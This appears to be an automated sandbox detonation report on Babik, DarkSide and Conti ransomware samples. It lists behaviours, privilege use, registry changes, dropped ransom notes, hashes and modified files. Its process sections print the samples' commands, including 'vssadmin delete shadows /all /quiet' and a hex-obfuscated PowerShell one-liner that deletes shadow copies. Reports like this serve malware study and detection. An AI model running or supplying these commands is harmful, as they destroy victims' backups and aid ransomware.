N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2404 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2404 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2404 wrote to memory of 592 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2580 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2772 wrote to memory of 2816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2772 wrote to memory of 2816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2772 wrote to memory of 2816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

\Device\HarddiskVolume1\Boot\cs-CZ\How To Restore Your Files.txt

MD5 b6e97028103bc6b18214f4b2bd0e0d23
SHA1 4c202c77782d55af635c28fa71b2ba58b294415e
SHA256 db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45
SHA512 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d

Analysis: behavioral19

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (190) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f3d73b46.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f3d73b46.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f3d73b46 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f3d73b46\ = "f3d73b46" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f3d73b46.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto

Files

memory/1804-5-0x000007FEF5AAE000-0x000007FEF5AAF000-memory.dmp

memory/1804-6-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/1804-7-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/1804-8-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

memory/1804-9-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

memory/1804-10-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c88f027adf377f4702d01edd42411d17
SHA1 cb0f93ffeaab4a1e7d9c22ce332d9762aa5099dd
SHA256 f39989c2048da0dfe98d95b77e17a972bd41e8647792683ef33e33694d0ee024
SHA512 59f985af5185a5f6f07c7f786d11a0bc7915fba1891a244be65e6afaa67407d3936d287c51988d24c4ca01052fbfee01c690991bd627cd91f934615268017811

C:\Users\Admin\README.f3d73b46.TXT

MD5 d4e176b40c4ea17f4870c34fad926d6e
SHA1 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512 feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral13

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (8072) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZO1X14N3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\MN6S8FGK\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\N7ZQRMOO\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\C906A748\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Common Files\System\ado\ja-JP\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CGMIMP32.HLP C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02097_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14866_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Acrobat\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PRRT.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DVDHM.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR21F.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\Discussion.gta C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\MSOINTL.REST.IDX_DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Waveform.eftx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
